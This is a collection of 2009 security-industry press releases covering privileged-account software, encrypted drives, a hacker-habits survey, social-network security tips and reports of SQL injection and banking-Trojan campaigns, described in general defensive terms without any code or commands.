Compared to existing industry offerings, Cyber-Ark’s third generation Application Identity Manager technology offers a more flexible solution that provides multiple authentication methods, creating greater accountability and reliability as well dramatically simplifying large scale deployments. This is important when an organization is tasked with the elimination of hard-coded passwords, for example. Organizations can’t just eliminate passwords, they need to be sure the password is authentic – that it’s registered and legitimate while carefully and efficiently executing any change management processes. Cyber-Ark ensures that authentication process is thorough, credible and auditable without creating additional steps.

Enterprise Password Vault: New Workflow Features Add Flexibility and Agility

Cyber-Ark’s Enterprise Password Vault enables organizations to secure, manage, automate and log all activities associated with privileged accounts. In most organizations, policies are used to define and enforce access workflows to privileged accounts, including central change management or emergency access based on ticketing system integrations. New workflow management enhancements allow easy integration with existing processes and create greater flexibility and agility to address current and future workflow questions, as well as different requirements from organizational units. Additionally, managers can better control privileged access down to specific time frames if necessary, resulting in greater security benefits and increased productivity for the IT staff.

Enhancements have also been made to address High Availability/Disaster Recovery requirements creating greater performance benefits that are especially important for large scale implementations, including those ranging from hundreds of thousands – to millions – of privileged accounts under management.

Privileged Session Manager: New Remote Sharing Benefits for Day-to-Day Use

Introduced with the launch of the Privileged Identity Management Suite v5, Cyber-Ark’s Privileged Session Manager provides the only fully integrated and centralized solution for securing, controlling and monitoring privileged access by administrators and third party vendors to target machines and sensitive systems. Enhancements allow for greater ease-of-implementation for users, and include simplified file sharing between the end-user desktop and remote device during a privileged session for improving ease of day-to-day use.

Pricing and Availability

The Cyber-Ark Privileged Identity Management Suite v5.5 is available now. The Enterprise Password Vault, Application Identity Manager and Privileged Session Manager are off-the-shelf solutions that can be purchased separately, or together as the full Suite. For more information about pricing, please contact sales@cyber-ark.com or call +1 (888) 808-9005 (domestic U.S.) or +1 (617) 965-1544 (international).

Cyber-Ark® Software is a global information security company that specializes in protecting highly-sensitive enterprise data, restricted user and application accounts to improve compliance, productivity and protect organizations against insider threats. With its award-winning Privileged Identity Management (PIM) and Highly-Sensitive Information Management software, organizations can more effectively manage and govern application access while demonstrating returns on security investments. Cyber-Ark works with 600 global customers, including more than 35 percent of the Fortune 50. Headquartered in Newton, Mass., Cyber-Ark has offices and authorized partners in North America, Europe and Asia Pacific. For more information, visit www.cyber-ark.com

<>

Hard disks will be boosted by Intel's Braidwood

Origin Storage says hard disks will be boosted by Intel's Braidwood

London, September 2009 (Eskenzi PR) – Origin Storage, the storage systems integration specialist, says that a new speed-boosting technology from Intel - known as Braidwood - will boost the position of magnetic hard drives in the storage systems marketplace.

According to Andy Cordial, the firm's managing director, the technology - which was first announced in June of this year - increases the speed of PC boot-up times, makes applications launch more quickly and improves the overall speed of a computer.

"A report from Objective Systems makes the interesting prediction that Braidwood - essentially an advance on Intel's Robson technology - will boost magnetic drives at the expense of solid state drives (SSDs) ," he said.

"This is good news for companies planning to use encrypted technology to secure their data, as it's a lot easier to integrate encryption with magnetic drives that their SSD equivalents," he added.

Cordial went on to say that, as Origin Storage has been saying for some time, the current perception that SSDs can replace magnetic drives in all portable devices and their applications is something of a misnomer.

SSDs, he explained, ar very suitable for specific applications, such as small form factor netbooks, but the role of magnetic drives remains strong in most other portable applications.

"The fact that Objective Systems comes to pretty much the same conclusion vindicates our position. SSDs have their place, but when it comes to the all-round flexibility that magnetic drives offer, there really is no competition," he said.

"There's no doubting that, as SSD capacities get larger over time and their cost per gigabyte reduces, they will increase their market share in the longer term. For the time being, however, as this report shows, magnetic drives will remain top of the tree," he added.

For more on the Objective Systems report: http://preview.tinyurl.com/lhmy9l

For more on Origin Storage: http://www.originstorage.com

<>

Imperva says new SQL injection attacks from China are ‘unique’

Imperva, the data security specialist, has said the mass SQL injection attack infecting hundreds of thousands of web sites show some unique characteristics, as all the attacks stem from China.

“We have been tracking this specific attack for the past 4 weeks and all the IP addresses that the automated attacks have come from are based in China. This is something unique, as usually attacks of this nature come from infected BOT PCs based all over the world rather than in one country. The SQL injection attack vector us in the attack is by itself quite standard and has been in common usage for the past 18 months. Any descent Web Application Firewall should be able to detect it“ said Amichai Shulman, Imperva's chief technology officer.

The Imperva CTO continued: “We are seeing a constant flow of attacks aimed at drive-by-download. Just in the past two month we have seen 3 different strands of such attack campaigns. In this latest wave we have recorded the attack coming from more than 60 servers based in China attacking sites around the world, rather than the global network typically seen in such attacks. Interestingly enough, 4 weeks into this attack campaign the malware distribution servers are still up and running.

The attack targets innocent visitors of the sites that have been hit, as it injects malicious IFRAME into these sites. Thus visitors are unknowingly downloading malware from China based servers while visiting such an infected site. Once infected by this malware, a user’s computer becomes a Zombie in a BOTNET that will later be used to distribute spam, participate in coordinated DDoS attacks or simply by used for extracting personal access credentials to other sites.

The Imperva CTO said that this type of SQL injection is one of the top five most popular attacks used by malicious hackers today and Enterprises should take appropriate external (web application firewall) and internal (code changes) to prevent their web servers becoming a source for distributing malware for cyber criminals.

Advice for enterprises:
· use application firewalls to protect themselves from infection
· use scanners and other tools to find and remove vulnerabilities in their website code
· ensure all application patches are implemented

Advice for individuals:
· ensure all browser updates are implemented immediately
· use the best technology to protect web browsing based on behavioural real-time technology
· implement all security signatures as soon as they are available

For further insight into the attacks, go to Amichai Shulman’s blog at: http://blog.imperva.com/2009/08/the-chinese-syndrom.html

For more on Imperva: http://www.imperva.com

Imperva, the Data Security leader, enables a complete security lifecycle for business databases and the applications that use them. Over 4,500 of the world’s leading enterprises, government organizations, and managed service providers rely on Imperva to prevent sensitive data theft, protect against data breaches, secure applications, and ensure data confidentiality. The award-winning Imperva SecureSphere is the only solution that delivers full activity monitoring from the database to the accountable application user and is recognized for its overall ease of management and deployment. For more information, visit www.imperva.com.  

<>

Increase in Cyber Criminals Targeting SMBs Online Bank Accounts

Finjan Warns SMBs of Increase in Cyber Criminals Targeting their Online Bank Accounts

Financial Services Information Sharing and Analysis Center Alert on Cybercrime on Target with Predicted Threat Landscape

(Eskenzi PR) – Finjan Inc., a leader in secure web gateway products and the provider of a unified web security solution for the enterprise market, today responded to the recent cybercrime alert that was sent to members of the Financial Services Information Sharing and Analysis Center. Finjan warns companies to increase security and improve employee awareness of the increase in threats to their online banking facilities in light of the increase of activity by Cyber Criminals.

The alert sent last Friday states that in the past six months, financial institutions, security companies and law enforcement agencies are all reporting a significant increase in funds transfer fraud. It involves the exploitation of valid banking credentials belonging to small and medium sized businesses.

“This illustrates a new facet of cybercrime that we are seeing today,” said Yuval Ben-Itzhak, CTO at Finjan. “In addition to the well-documented, massive data breaches against large institutions, organized cyber gangs are also now shifting their focus on small and mid-size companies. This trend includes stealing credentials to gain access to the corporate network to initiate a series of fraudulent wire transfers in increments of less than $10,000 from corporate bank accounts, which helps them avoid banks' anti-money-laundering reporting requirements.”

“We have seen an increase in targeted attacks against financial institutions already in 2008 and predicted in our Web Security Trends Report of last year that both the amount of attacks and their severity will increase against financial institutions and their customers,” Ben-Itzhak added. “We welcome and encourage the continued sharing of this kind of cybercrime intelligence to help minimize the effects of cybercrime. Sharing information, as also pointed out by the security team of Google, helps raise awareness as to the methods and techniques cybercriminals use and ultimately will contribute to the safety of business. Enterprises, Medium and Small businesses should heed the warning of the Financial Services Information Sharing and Analysis Center and we advise them to out in place appropriate security which utelises real time inspection technology , they put in processes to check their financial transactions regularly for irregularities and train their people to follow best security practices. ” Ben-Itzhak concluded.

In the UK businesses should also be aware of the advice contained in the banking code and specifically section 12.9 and 12.11, as if they do not follow the advice of the British Bankers' Association then their bank has the right to refuse to reimburse them for an online fraud carried out against them.

To see more about the banking code: Clause 12.9 http://www.bba.org.uk/bba/jsp/polopoly.jsp?d=348&a=13157&artpage=4

Clause 12.11 http://www.bba.org.uk/bba/jsp/polopoly.jspd=348&a=13157&artpage=5

To read Finjan’s Web Security Trends Report – Q4/2008: http://www.finjan.com/Content.aspx?id=827

To read Google’s research: http://googleonlinesecurity.blogspot.com/2009/08/malware-statistics-update.html

To read more on the cybercrime alert: http://www.washingtonpost.com/wp-dyn/content/article/2009/08/24/AR2009082402272_2.html?sid=ST2009082500907

http://voices.washingtonpost.com/securityfix/2009/08/businesses_reluctant_to_report.html?wprss=securityfix

Finjan’s MCRC specializes in the detection, analysis and research of web threats, including Crimeware, Web 2.0 attacks, Trojans and other forms of malware. Our goal is to be steps ahead of hackers and cybercriminals, who are attempting to exploit flaws in computer platforms and applications for their profit. In order to protect our customers from the next Crimeware wave and emerging malware and attack vectors, Finjan MCRC is a driving force behind the development of Finjan's next generation of security technologies used in our unified Secure Web Gateway solutions. For more information please also visit our info center and blog.

Finjan is a leading provider of secure web gateway solutions for the enterprise market. Finjan Secure Web Gateway provides organizations with a unified web security solution combining productivity, liability and bandwidth control via URL categorization, content caching and applications control technologies. Crimeware, malware and data leakage are proactively prevented via patented active real-time content inspection technologies and optional anti-virus modules. Powerful central management enables intuitive task-based policy management, excellent drill-down reporting capabilities and easy directory integration for all network implementation options. By integrating several security engines in a single dedicated appliance, Finjan’s comprehensive and integrated web security solution enables quick deployment, simplified management and reduction of costs. Business benefits include real-time web security (no patches or updates needed), lower total cost of ownership (TCO), cost savings in administration efforts, lower maintenance costs, and reduction in loss of productivity. Finjan's security solutions have received industry awards and recognition from leading analyst houses and publications, including Gartner, IDC, Butler Group, SC Magazine, eWEEK, CRN, ITPro, PCPro, ITWeek, Network Computing, and Information Security. With Finjan’s award-winning and widely used solutions, businesses can focus on implementing web strategies to realize their full organizational and commercial potential.

For more information about Finjan, please visit: www.finjan.com

<>

HACKERS SAY TAKE SUMMER OFF BEFORE THE WINTER SPIKE

HACKERS SAY TAKE A BREAK THIS SUMMER BEFORE WINTER HACKING SPIKE

Hacker Survey at DEFCON Reveals Hackers Work the Night Shift; Believe Compliance Initiatives Don’t Improve A Company’s Security Posture

(Eskenzi PR) – Enjoy the rest of your summer vacation say the hacking community, as you’re far less likely to be targeted now than during your Christmas and New Year vacation. That’s according to the results released today by Tufin Technologies, the leading provider of Security Lifecycle Management solutions, who have released the findings of its “Hacker Habits” survey conducted amongst 79 hackers at the annual gathering of hackers at Defcon 17 in Las Vegas this month. Eighty nine percent of hackers admitted that IT professionals taking a summer vacation would have little impact on their hacking activities, as a whopping 81% revealed they are far more active during the winter holidays with 56% citing Christmas as the best time to engage in corporate hacking and 25% naming New Years Eve.

“It’s received knowledge in the security world that the Christmas and New Year season are popular with hackers targeting western countries,” said Michael Hamelin, chief security architect, Tufin Technologies. “Hackers know this is when people relax and let their hair down, and many organizations run on a skeleton staff over the holiday period.”

If you want to know when you should be most on your guard it’s during weekday evenings with 52% stating that this is when they spend most of their time hacking, 32% during work hours (weekdays), and just 15% hacking on weekends.

Ninety six percent of hackers in the survey said it doesn’t matter how many millions a company spends on its IT security systems, it’s all a waste of time and money if the IT security administrators fail to configure and watch over their firewalls. Eighty six percent of respondents’ felt they could successfully hack into a network via the firewall; a quarter believed they could do so within minutes, 14% within a few hours. Sixteen percent wouldn’t hack into a firewall even if they could.

“This may be stating the obvious,” said Hamelin, “but poorly configured firewalls remain a significant risk for many organizations. It’s not the technology that’s at fault, but rather the configuration and change control processes that are neglected or missing altogether. Best practice suggests you should test and review your firewall configuration regularly, but many organizations fail to do so.”

Validating the frustrating gap between compliance and security, seventy percent of the hackers interviewed don’t feel that regulations introduced by governments worldwide to implement privacy, security and process controls has made any difference to their chances of hacking into a corporate network. Of the remaining 30%, 15% said compliance initiatives have made hacking more difficult and 15% believe they’ve made it easier.

“These results further validate the reality that there is little common ground between compliance and security, but as an industry we have the collective knowledge and the resources to change that,” said Hamelin. “As the media constantly reminds us, while standards such as PCI-DSS provide a good baseline, organizations that assume achieving PCI compliance will solve their security woes are in for a rude awakening. With security and compliance budgets so deeply intertwined, it serves us as security professionals to make the two more synonymous. At the end of the day, the more accountable we are willing to be, the less we’ll have to be.”

With the Network Solutions breach being the latest in a series of widely reported breaches of PCI compliant companies, how big is the threat of a high-profile malicious hack? One important factor in determining that is to understand the scope of criminal activity.

Seventy percent of those sampled believe the number of malicious hackers – criminals motivated by economic gain – is less then 25% of the of hacker community.

“This survey highlights the fact cyber security investments are only as effective as the people, processes and technology tasked with managing them,” said Hamelin. “Just as a small subset of criminal hackers can taint the reputation of an entire community, a few good guys willing to be accountable for their internal processes and technology can preserve a company’s reputation. With winter right around the corner, we have time to shift the dynamic from 86% who can hack into a network through its firewalls to 86% that can’t.”

Tufin Technologies is the leading provider of Security Lifecycle Management solutions that enable large organizations to enhance security, ensure business continuity and increase operational efficiency. Tufin’s products SecureTrack, SecureChange™ Workflow, and the Tufin Security Suite™, help security operations teams to manage change, minimize risks and dramatically reduce manual, repetitive tasks through automation. Tufin’s open, extensible architecture enables any company with best of breed applications, devices and systems to take advantage of Tufin’s unmatched policy optimization, change management, and auditing capabilities. With a combination of accuracy and simplicity, Tufin empowers security officers to perform reliable audits and demonstrate compliance with corporate and government standards. Founded in 2005 by leading firewall and business systems experts, Tufin now serves more than 325 customers around the world, including leading financial institutions, telecom service providers, transportation, and energy and pharmaceutical companies. For more information visit www.tufin.com, or follow Tufin on:
Twitter at http://twitter.com/TufinTech,
LinkedIn at http://www.linkedin.com/groupRegistration?gid=1968264,
FaceBook at http://www.facebook.com/group.php?gid=84473097725,
The Tufin Blog at http://tufintech.wordpress.com/
The Tufin Channel on YouTube at http://www.youtube.com/user/Tufintech

<>

Hammer to Distribute Data Locker Encrypted Disk Drive

Unique portable disk drive utilizes LCD keypad and PIN system to ensure complete data security

Basingstoke, 24th August 2009 (Eskenzi PR) : Dedicated storage distributor, Hammer, has announced it is to distribute Origin Storage’s acclaimed Data Locker portable disk drive in a pan-European agreement, where Hammer is the exclusive VAD for the UK and Nordics markets.

The product uses an innovative PIN system, requiring the user to enter their 6 – 18 digit number on the unique LCD keypad in order to access the content, ensuring the data contained is secure and can only be accessed by trusted sources.

The Data Locker utilizes a hardware based encryption chip to seamlessly encrypt and decrypt data using military grade AES (128/256) mode encryption. The other state-of-the-art features include: random keypad, one-touch drive erase for rapid re-deployment using admin password, brute force attack detect / self destruct response, and hardware based malware detection / deflection.

Gerard Marlow, Disk Business Development Manager at Hammer, says: “This product is the ideal amalgamation of storage and security. It fits extremely well into Hammer’s portfolio, and resellers will find it will suit a wide range of their customers’ portable hard drive needs.”

Marlow continues: “In today’s society, security breaches and losses of data are unfortunately common occurrences. Data Locker’s unique security features, combined with impressive speeds and capacities, create the ideal environment for the transportation of sensitive data and files.”

Andy Cordial, Managing Director of Origin Storage, stated: “Hammer has an excellent record in supporting storage manufacturers in the UK and throughout Europe, and was our first choice of distributor for Data Locker. Due to the positioning of Data Locker as a high-end AES hardware encrypted portable storage device, and Hammer’s position as a high end supplier of storage solutions, it became obvious that Hammer was the number one choice.”

Cordial added: “I am confident that Hammer will add awareness and value to the Data Locker brand”.

Available in capacities of 160GB, 320GB, 500GB, 750GB & 1TB, and covering two levels of security: Pro AES, for corporate and local government; and Enterprise, for military and transportation of mission critical data, the Data Locker has the scope to accommodate all requirements.

Hammer is a leading specialist storage distributor. Its success is based on a total commitment to storage, combined with unrivalled technical knowledge and customer service quality in providing data storage for any storage requirement. Recognized for its commitment to innovation, Hammer works closely with selected world-class vendors and market-leading resellers and integrators. It also develops and provides flexible and bespoke storage solutions for all markets. Founded in 1991 and a privately owned company, Hammer has its headquarters in Basingstoke, England, with a staff of 100+, and has increasing European presence with offices in Ireland, the Nordics, Italy, and Benelux. For further information visit the website at www.hammerplc.com.

Origin Storage is a leading provider and manufacturer of disk-based data storage solutions, including the Data Locker range of touch LCD screen, PIN protected, hardware encrypted external USB bus powered storage solutions. The Data Locker Pro provides 128bit AES hardware encryption, and the Data Locker Enterprise provides 256bit AES hardware encryption with administrator privileges. Both products are available with 160-500GB capacity points and provide the most comprehensive hardware encryption features in the market today, providing a huge opportunity for VARs and system integrators to add a product range to meet the needs of data security conscious customers, at a time where high profile corporate and government data losses are a major cause for concern.

<>

Finjan Welcomes Initiatives for Public Disclosure of Cybercrime Incidents Information

San-Jose, Calif., August, 2009 (Eskenzi PR) – Finjan Inc., a leader in secure web gateway products and the provider of a unified web security solution for the enterprise market, responded today to the latest initiative for public disclosure of cybercrime incidents.

Corporate bank accounts are a popular target for cybercriminals. The soaring growth in cybercrime and attacks on businesses has dire implications. Dealing with the damage of a data breach is costly and time-consuming, and could even affect the survival of companies.

To face the current wave of cybercrime, a lawsuit has been filed by Unspam Technologies, in Virginia under the CAN SPAM Act to obtain forensic information about bank breaches that will help tracing the perpetrators and bring them to justice.

“Finjan supports more public disclosure of data breaches. We believe such disclosure will help to minimize cybercrime and to keep institution as well as their customers safe.”, said Yuval Ben-Itzhak, CTO at Finjan.

“As explained in the lawsuit, one of the techniques for corporate bank account robbery involves the use of Trojan malware programs such as Zeus,” he continued. “The Zeus Trojan has been around for some time and remains popular. Our Malicious Code Research Center (MCRC) has detected and reported on various cases of data breaches using Zeus and similar malware. Cybercrime targeting businesses keeps on rising,” Ben-Itzhak concluded.

To keep abreast of the latest news on cybercrime trends, please visit: http://www.finjan.com/MCRCblog.aspx

To read more on the lawsuit: http://www.nytimes.com/2009/08/20/technology/20hacker.html

Finjan’s MCRC specializes in the detection, analysis and research of web threats, including Crimeware, Web 2.0 attacks, Trojans and other forms of malware. Our goal is to be steps ahead of hackers and cybercriminals, who are attempting to exploit flaws in computer platforms and applications for their profit. In order to protect our customers from the next Crimeware wave and emerging malware and attack vectors, Finjan MCRC is a driving force behind the development of Finjan's next generation of security technologies used in our unified Secure Web Gateway solutions. For more information please also visit our info center and blog.

Finjan is a leading provider of secure web gateway solutions for the enterprise market. Finjan Secure Web Gateway provides organizations with a unified web security solution combining productivity, liability and bandwidth control via URL categorization, content caching and applications control technologies. Crimeware, malware and data leakage are proactively prevented via patented active real-time content inspection technologies and optional anti-virus modules. Powerful central management enables intuitive task-based policy management, excellent drill-down reporting capabilities and easy directory integration for all network implementation options. By integrating several security engines in a single dedicated appliance, Finjan’s comprehensive and integrated web security solution enables quick deployment, simplified management and reduction of costs. Business benefits include real-time web security (no patches or updates needed), lower total cost of ownership (TCO), cost savings in administration efforts, lower maintenance costs, and reduction in loss of productivity. Finjan's security solutions have received industry awards and recognition from leading analyst houses and publications, including Gartner, IDC, Butler Group, SC Magazine, eWEEK, CRN, ITPro, PCPro, ITWeek, Network Computing, and Information Security. With Finjan’s award-winning and widely used solutions, businesses can focus on implementing web strategies to realize their full organizational and commercial potential.

For more information about Finjan, please visit: www.finjan.com

<>

Social Networking Poll Shows Users More Vulnerable Than Ever

AVG and CMO Council survey shows that the widespread and growing use of social networks at home and work is creating serious danger of web-borne identity theft and infection

by Michael Smith (Veshengro)

The results of “Bringing Social Security to the Online Community” poll were released in late August 2009, and they are highlighting the vulnerabilities and concerns of social community members around cyber-security and the precautions that they are taking or need to take to protect themselves.

The online survey conducted by AVG and the CMO Council reveals that while the social networking community has serious concerns about the overall security of public spaces, few are taking the most basic of steps to protect themselves against online crimes.

The survey shows that while the majority of social networking users are afflicted by web-borne security problems, less than one third are taking actions to protect themselves online.

The problem and I do not think that this should come as a surprise to anyone, is how vulnerable people make themselves in those networks and forums. Anyone who is using those social networks and similar systems can see how open people go about without the slightest consideration as to who could gain access to their personal info.

Participants indicated concern over growing phishing, spam and malware attacks, and nearly half of those surveyed are very concerned about their personal identity being stolen in an online community.

Many, however, do not use any proper measures to protect themselves despite the fact that both AVG and Finjan provide free browser tools that will check, for instance, the safety of links.

Often when people encounter problems and – for instance – contact me I am amazed (though really should not be anymore) how many of them have no or no updated AV and anti-malware programs on board.

The survey was conducted online during the second quarter of 2009 and gathered responses from a random sampling of more than 250 consumers. According to the poll results, despite widespread use (86 percent) of social networks at home and/or at work, most fail to perform the following basic security measures on a regular basis:
Changing passwords (64 percent infrequently or never)
Adjusting privacy settings (57 percent infrequently or never)
Informing their social network administrator (90 percent infrequently or never)

“As social networking populations grow globally and the proliferation of niche social networks and mobile offerings extends the reach of social communities, the threats and vulnerabilities are escalating accordingly,” said Donovan Neale-May, executive director of the CMO Council. “More frequent breaches and outbreaks on popular social sites are a testament to the need for a more preventative mindset and threat-alert culture among community users.”

Despite the apparent security risks and dangers of engaging in social networking sites, respondents identified several common practices that could cause harm to unprotected users:
21 percent accept contact offerings from members they don’t recognize
More than half let acquaintances or roommates access social networks on their machines
64 percent click on links offered by community members or contacts
26 percent share files within social networks

As a result of this widespread proliferation of links, files, and unsolicited contacts, users have experienced high levels of breaches and threats:
Nearly 20 percent have experienced identity theft
47 percent have been victims of malware infections
55 percent have seen phishing attacks

“The fact that users understand the risks, and yet are failing to take the basic steps to protect themselves presents an interesting challenge to companies, like AVG, that are working to create a safer cyber community,” said Siobhan MacDermott, Head of Public Policy, Corporate Communications and Investor Relations, AVG Technologies.

According to MacDermott, AVG hopes to reverse this trend on familiar turfs such as Facebook and Twitter. “Our Data Snatchers campaign is a viral effort that will not only get consumers thinking about their personal security but will also provide them with simple tools to do something about it when they are in the spaces that make them feel the most vulnerable.”

MacDermott said that the Data Snatchers campaign is about combining sound technology with safe practices while enjoying the social computing experience.

In addition to encouraging users to take advantage of AVG’s free security offering at http://avgfree.com MacDermott encourages users to follow Six Simple Steps to Stay Secure:
1.Do not accept pop-ups or prompts for software, unless you're armed with web scanner software such as AVG's free LinkScanner, which checks each site for infections prior to access.
2.Do not ever provide, post, or submit any confidential personal data (e.g., SSN, banking details, medical records). Social networking sites do not require this sort of information to join, unless you're online dating or paying monthly.
3.Change your password at least once a month. Do not change it if you're prompted to. This can be a third party malicious link.
4.Do not let friends, peers, coworkers, etc. access their social networks on your computer, nor yours on their machine. Others could introduce infections to your computer through unsafe practices, or your login security could be compromised via cookies saved on your computer.
5.Never auto save your password information, and clear your history at least once a week.
6.Do not accept friend requests or request friends that you personally do not know.

A full summary and presentation of the survey results and implications is available at avgnews.com.

Keep in touch with AVG
For up-to-the-minute news on the latest cyberthreats:
Subscribe to AVG Chief Research Officer Roger Thompson’s blog at http://thompson.blog.avg.com/

For general AVG updates
Join our Facebook community at www.facebook.com/avgfree
Follow AVG on Twitter @officialavgnews.com
Register at www.avgnews.com

To download AVG’s free LinkScanner product:
Visit http://linkscanner.avg.com/

The Chief Marketing Officer (CMO) Council is dedicated to high-level knowledge exchange, thought leadership and personal relationship building among senior corporate marketing leaders and brand decision-makers across a wide-range of global industries. The CMO Council's 4,500 members control more than $120 billion in aggregated annual marketing expenditures and run complex, distributed marketing and sales operations worldwide. In total, the CMO Council and its strategic interest communities include over 12,000 global executives across 90 countries in multiple industries, segments and markets. Regional chapters and advisory boards are active in the Americas, Europe, Asia Pacific, Middle East and Africa. The Council's strategic interest groups include the Coalition to Leverage and Optimize Sales Effectiveness (CLOSE), Brand Management Institute, and the Forum to Advance the Mobile Experience (FAME). www.cmocouncil.org

AVG is a global security software maker protecting more than 80 million consumers and small businesses in 167 countries from the ever-growing incidence of web threats, viruses, spam, cyber-scams and hackers on the Internet. AVG has nearly two decades of experience in combating cyber crime and one of the most advanced laboratories for detecting, pre-empting and combating Web-borne threats from around the world. Its free, downloadable software allows novice users to have basic anti-virus protection and then easily upgrade to greater levels of safety and defense when they are ready. AVG has nearly 6,000 resellers, partners and distributors globally including Amazon.com, CNET, Cisco, Ingram Micro, Play.com, Wal-Mart, and Yahoo!

While AVG, obviously, would want you to buy their pay-for products the AVG Free protects very well indeed and is program that I do advise to anyone who is willing to listen.

Combined with a few other programs such as PC Tools' “Threatfire” (please do not attempt to use in conjunction with ZoneAlarm) and with the use of proper caution at all times, problems should not occur.

© 2009
<>

Blogger asks CPS to 'take one for the team' in Gary McKinnon case

Infosecurity Adviser blogger asks CPS to 'take one for the team' in Gary McKinnon case

London UK, August 2009 (Infosecurity PR) - Neil Stinchcombe, a blogger for Infosecurity Adviser, has asked the Crown Prosecution Service (CPS) - which approved the US extradition request for self-confessed UFO hacker Gary McKinnon - to revisit the case following the failure in the latest, and final stage of, Gary's legal appeal process.

In a comment on the case on the Infosecurity Adviser Web site, Stinchcombe says that Gary is "just a pawn in a political and legal game between the UK and the US," adding that the original gameplan was for the CPS to revisit its original approval the US government's extradition request.

"However, as Alan Johnson, the current Home Secretary, said when writing in the Sunday Times a few days after Gary's latest appeal through the courts stated: `It would be unlawful for the home secretary to intervene'."

Despite this, Stinchcombe says that the medical condition that Gary suffers from, coupled with the fact that the current US/UK extradition treaty is clearly biased against UK citizens, makes the US extradition request wholly unfair.

"As a result of these highly extenuating circumstances, I am now asking for the CPS to `take one for the team' and admit that its original approval on the extradition case was inappropriate," he said.

"Gary has become a pawn in a much bigger game," he explained, adding that if the CPS revisits its analysis of the case, then the UK government can quite honourably rescind the application and he can be tried as a UK citizen in a UK court," he added.

Stinchcombe and his colleagues on the Insecurity Adviser are so incensed by the UK government's insensitivity in the case that they are conducting a poll on the site - http://www.infosec.co.uk/gary - which asks visitors whether they think the CPS should declare its original assessment of the extradition request invalid.

"The reason for this is quite simple - we don't think that the CPS took all the relevant conditions in account when evaluating the US request," he said.

For more on Neil Stinchcombe's endgame analysis - and poll - on the Gary McKinnon case, see http://www.infosecurityadviser.com/view_message?id=136

Infosecurity Adviser is a unique community portal representing the information security industry and it's users, organized in association with Infosecurity Europe. It offers advice from industry experts and bloggers as well as end user product reviews. It also contains information on qualifications, career paths and jobs from all the major accreditation bodies and is supported by the Information Security Awareness Forum. For more information see http://www.infosecurityadviser.com

<>

RSA® Conference Europe 2009 Launches Registration Grant Programme to Help IT Security Professionals Learn New Skills and Get Back to Work

Grant Aims to Provide Education and Networking Opportunities for Information Security Practitioners

London, UK, 1 September 2009 - RSA® Conference, the world’s leading information security conference group, today announced in partnership with Acumin Consulting Ltd., the leading provider of Information Risk Management staff in Europe , the launch of its new Registration Grant Programme for security practitioners who have lost their jobs amid the economic downturn.

The RSA Conference Europe Registration Grant Programme will provide information security professionals the opportunity to attend RSA Conference Europe, where they can stay apprised of the latest security innovations, network with hundreds of peers and make valuable contacts.

This newly-launched Programme will award complimentary RSA Conference Europe 2009 delegate passes to five previous attendees of the Conference, as well as five delegate passes to information security professionals who are interested in continuing their education.

Criteria to be selected for the RSA Conference Europe Registration Grant Programme includes:

  • Must be an information security professional (practitioner, security architect or similar role);
  • Must complete a 1,000 character explanation on “Why I want to attend RSA Conference Europe 2009”
  • Must submit a 750-character biography to verify their role as security practitioners
  • Must be willing to participate in on-site promotional activities

To apply for the RSA Conference Europe Registration Grant Programme, information security professionals can submit their applications online at http://www.rsaconference.com/2009/europe/index.htm, between Tuesday 1st September and Friday 11th September. Ten qualified entrants will be selected by RSA Conference Europe and Acumin Consulting Ltd., and notified by Tuesday 15th September if they have received a free Delegate pass to RSA Conference Europe 2009. Acumin Consulting Ltd. will also provide an on-site career counselling service to the ten successful submissions at the Conference.

“Many security professionals have lost their jobs as a result of the current economic environment,” said Linda Lynch, RSA Conference Europe Manager. “This new programme provides another way for RSA Conference to help industry practitioners enhance their skills and improve their career prospects.”

To obtain more information regarding RSA Conference Europe 2009, please visit the event website at http://www.rsaconference.com/2009/europe/index.htm

RSA Conference Europe and Acumin will select successful applicants based on the criteria outlined above in its sole discretion. The decision of RSA Conference Europe and Acumin is final and does not reflect the opinions of, or serve as an endorsement by, the sponsors or exhibitors of RSA Conference Europe, RSA, The Security Division of EMC or Acumin. RSA Conference management reserves the right to modify these qualifications and rules related at any time, without notice. The free Delegate pass given as part of the RSA Conference Europe Registration Grant Programme only covers the delegate registration fee for RSA Conference Europe 2009 in London from 20th -22nd October, 2009 and does not cover hotel, travel, parking or any other incidental expenses.

RSA Conference helps drive the global information security agenda with annual events in the U.S., Europe and Japan. Throughout its 18-year history, RSA Conference consistently attracts the world’s best and brightest in the field, creating opportunities to learn about information security’s most important issues through face-to-face and online interactions with peers, luminaries and emerging and established companies. As information security professionals work to stay ahead of ever-changing security threats and trends, they turn to RSA Conference for a 360-degree view of the industry. RSA Conference seeks to arm participants with the knowledge they need to remain at the forefront of the information security business. More information on events, online programming and the most up-to-date news pertaining to the information security industry can be found at www.rsaconference.com.

Acumin is the leading provider of Information Risk Management staff in Europe. Established in 1998, our specialist team of consultants have unrivalled knowledge of the Information Security, Business Continuity, Storage and Data Protection markets. We supply both permanent and contract staff at all levels to industries spanning all sectors from first tier banks to global consultancies and software companies across EMEA.

Since its inception, Acumin has achieved its success through developing strong business relationships with leading Information Security companies, helping them to develop strong professional services and sales teams. In addition, Acumin have helped to develop internal Information Risk Management teams within end users across the UK and Europe.

Building on the success of the core offering of permanent and contract recruitment, Acumin has leveraged its knowledge of the risk management markets to introduce further offerings including retained search, team moves, networking events and European market entry consultancy to organisations within the UK and across Europe and the US.

For more information visit www.acumin.co.uk

<>